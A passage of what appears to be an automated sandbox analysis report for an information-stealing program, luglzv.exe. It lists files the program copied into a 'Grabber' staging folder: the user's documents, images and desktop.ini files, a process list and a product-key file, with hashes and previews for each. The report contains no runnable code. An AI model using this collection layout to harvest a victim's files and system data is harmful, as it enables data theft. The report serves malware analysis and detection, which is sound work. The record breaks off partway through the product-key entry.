                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\WUTJSCBCFX.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.688284131239007
                                                                  Encrypted:false
                                                                  SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                  MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                  SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                  SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                  SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                  Malicious:false
                                                                  Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\YPSIACHYXW.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZBEDCJPBEY.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):3.5191090305155277
                                                                  Encrypted:false
                                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                  MD5:3A37312509712D4E12D27240137FF377
                                                                  SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                  SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                  SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):190
                                                                  Entropy (8bit):3.5497401529130053
                                                                  Encrypted:false
                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):190
                                                                  Entropy (8bit):3.5497401529130053
                                                                  Encrypted:false
                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):504
                                                                  Entropy (8bit):3.514398793376306
                                                                  Encrypted:false
                                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\System\Process.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):17574
                                                                  Entropy (8bit):5.698099289332728
                                                                  Encrypted:false
                                                                  SSDEEP:96:HlcQuJQuwQX7QCpzQu2Q8C23ioQA1QuvkQu4QpqcBZQpUETRQq4QCYqQu6Qubfwl:HMqnUEnbYim4Jzvwq4WKc16uj2
                                                                  MD5:50A50A0E30E2272F900624CD6319FCB3
                                                                  SHA1:11B9ECC7F0E5C990521D83CA8E8FD94499C53C40
                                                                  SHA-256:077A859AC24B7A510364B376474F843F82E67D6F291E92869AD0CE2B3109CB97
                                                                  SHA-512:D2924877C0A44E435F15A4827113C37F6008E83897FD6E9260317ADB8A1C476D50B3BC3B024F0B48ED036F940F94E302A65E5C01E6FB85C08B5F36D0633CC50B
                                                                  Malicious:false
                                                                  Preview:NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 5596..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6888..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6456..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: fontdrvhost..PID: 784..EXE: C:\Windows\system32\fontdrvhost.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6020..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: dllhost..PID: 3428..EXE: C:\Windows\system32\DllHost.exe..NAME: csrss..PID: 408..EXE: ..NAME: svchost..PID: 1724..EXE: C:\Windows\

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\System\ProductKey.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29
                                                                  Entropy (8bit):4.142295219190902
                                                                  Encrypted:false
                                                                  SSDEEP:3:O2eRntm:OrRnI
